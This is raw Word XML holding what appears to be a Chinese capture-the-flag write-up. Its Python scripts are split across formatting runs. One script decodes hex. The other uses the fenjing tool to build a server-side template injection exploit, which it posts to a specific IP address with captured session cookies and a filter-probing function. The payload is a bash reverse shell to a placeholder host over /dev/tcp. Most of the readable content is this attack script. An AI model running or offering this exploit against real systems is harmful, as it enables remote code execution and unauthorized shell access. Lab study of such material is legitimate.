        <w:t>bytes</w:t>
      </w:r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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>fromhex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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spellStart"/>
      <w:r w:rsidRPr="00867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hex_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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77B999E3" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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26518237" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t># Convert bytes to string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFD4F6D" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>decoded_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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86759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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>bytes_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="CE9178"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'utf-8'</w:t>
      </w:r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53DCBB19" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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867590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spellStart"/>
      <w:r w:rsidRPr="00867590">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>decoded_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00867590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56029841" w14:textId="77777777" w:rsidR="00867590" w:rsidRPr="00867590" w:rsidRDefault="00867590" w:rsidP="0086759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34C66842" w14:textId="77777777" w:rsidR="00867590" w:rsidRDefault="00867590" w:rsidP="00EA3779"/>
    <w:p w14:paraId="049A6958" w14:textId="25642914" w:rsidR="009867AD" w:rsidRDefault="009867AD" w:rsidP="00EA3779">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>脚本2：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2845BCFD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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>functools</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="166FF142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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F871F0E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4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBF511F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586C0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>from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fenjing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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exec_cmd_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0F9807D4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56710344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proofErr w:type="spellStart"/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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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"http://101.200.138.180:16356/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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evlelLL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/646979696775616e"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48972AD5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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>session=eyJhbnN3ZXJzX2NvcnJlY3QiOnRydWV9.ZkQrdg.TTUE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="6A9955"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>-T5iRTAmIfSy5szAO9ZMgkA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A531321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cookies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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1011CC75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'session'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: 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'eyJhbnN3ZXJzX2NvcnJlY3QiOnRydWV9.Zk_z-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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g.dwfPDIOCrkNjPsWEE</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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_2_PjL5bvg'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD5476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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66FDEFEF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headers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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EA7F16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'User-Agent'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: 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'Mozilla/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36'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,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1A51F9" w14:textId="55884820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'Content-Type'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: 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'application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C79546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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B673C5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DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>functools</w:t>
      </w:r>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.lru_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cache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gramEnd"/>
      <w:r w:rsidRPr="009867AD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4684487F" w14:textId="4B8414A8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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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gramEnd"/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payload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: </w:t>
      </w:r>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>str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):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDE1A9C" w14:textId="2B414DEA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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>time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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0.02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) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591DC7E4" w14:textId="6843C6F1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resp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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="4EC9B0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>requests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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>post</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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headers</w:t>
      </w:r>
      <w:r w:rsidRPr="009867A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headers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cookies</w:t>
      </w:r>
      <w:r w:rsidRPr="009867A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cookies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timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="009867A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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="B5CEA8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>10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data</w:t>
      </w:r>
      <w:r w:rsidRPr="009867A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{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proofErr w:type="spellStart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iIsGod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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: </w:t>
      </w:r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payload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})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A4A92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9867AD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大胆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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>not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569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>in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resp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text</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="625BAD96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__name__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D4D4D4"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>==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"__main__"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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721F3891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shell_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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will_print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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9867A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exec_cmd_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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gramEnd"/>
    </w:p>
    <w:p w14:paraId="32CA1427" w14:textId="77777777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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="DCDCAA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>waf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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'bash -c "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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&gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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xxx.xxx.xxx.xxx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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/2336 0&gt;&amp;1"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A348CAA" w14:textId="30287B6E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    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182B72D9" w14:textId="1C13FD03" w:rsidR="009867AD" w:rsidRPr="009867AD" w:rsidRDefault="009867AD" w:rsidP="009867A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9867AD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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>f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9867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="9CDCFE"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>shell_payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009867AD">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="569CD6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=}</w:t>
      </w:r>
      <w:r w:rsidRPr="009867AD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9867AD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2C3D22A6" w14:textId="77777777" w:rsidR="009867AD" w:rsidRPr="006B61FE" w:rsidRDefault="009867AD" w:rsidP="00EA3779"/>
    <w:sectPr w:rsidR="009867AD" w:rsidRPr="006B61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34A4E" w14:textId="77777777" w:rsidR="006A5783" w:rsidRDefault="006A5783" w:rsidP="00E37441">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2890092D" w14:textId="77777777" w:rsidR="006A5783" w:rsidRDefault="006A5783" w:rsidP="00E37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69AA" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61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EF3B5" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61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0774E" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61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40AFF" w14:textId="77777777" w:rsidR="006A5783" w:rsidRDefault="006A5783" w:rsidP="00E37441">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B59BFBE" w14:textId="77777777" w:rsidR="006A5783" w:rsidRDefault="006A5783" w:rsidP="00E374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963A" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61FE" w:rsidP="006B61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A875" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61FE" w:rsidP="006B61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531FA" w14:textId="77777777" w:rsidR="006B61FE" w:rsidRDefault="006B61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791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30AE8"/>
    <w:rsid w:val="000477D2"/>
    <w:rsid w:val="00056427"/>
    <w:rsid w:val="0006176A"/>
    <w:rsid w:val="000C1C05"/>
    <w:rsid w:val="000F5B24"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="00177EE1"/>
    <w:rsid w:val="001B495D"/>
    <w:rsid w:val="00213493"/>
    <w:rsid w:val="002C17DC"/>
    <w:rsid w:val="002C2170"/>
    <w:rsid w:val="00347E3D"/>
    <w:rsid w:val="0035409A"/>
    <w:rsid w:val="003A02DE"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="003D31D4"/>
    <w:rsid w:val="00423F91"/>
    <w:rsid w:val="00485E9E"/>
    <w:rsid w:val="005314D4"/>
    <w:rsid w:val="00533F10"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="005B2FC8"/>
    <w:rsid w:val="005B53B5"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="00665256"/>
    <w:rsid w:val="00687AE0"/>
    <w:rsid w:val="006A5783"/>
    <w:rsid w:val="006B61FE"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="007510BD"/>
    <w:rsid w:val="00867590"/>
    <w:rsid w:val="008C3BB0"/>
    <w:rsid w:val="008D1FF7"/>
    <w:rsid w:val="009012EE"/>
    <w:rsid w:val="00983D21"/>
    <w:rsid w:val="009867AD"/>
    <w:rsid w:val="009A044C"/>
    <w:rsid w:val="009E4A30"/>
    <w:rsid w:val="009F297D"/>
    <w:rsid w:val="00A6290B"/>
    <w:rsid w:val="00A91ABA"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00CF4697"/>
    <w:rsid w:val="00D01E13"/>
    <w:rsid w:val="00E37441"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00E57A39"/>
    <w:rsid w:val="00EA3779"/>
    <w:rsid w:val="00EB4428"/>
    <w:rsid w:val="00EB697D"/>
    <w:rsid w:val="00EC5DB2"/>
    <w:rsid w:val="00F17250"/>
    <w:rsid w:val="00F46E63"/>
    <w:rsid w:val="00F5430B"/>
    <w:rsid w:val="00F66B02"/>
    <w:rsid w:val="00FC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74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74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35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-24T11:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>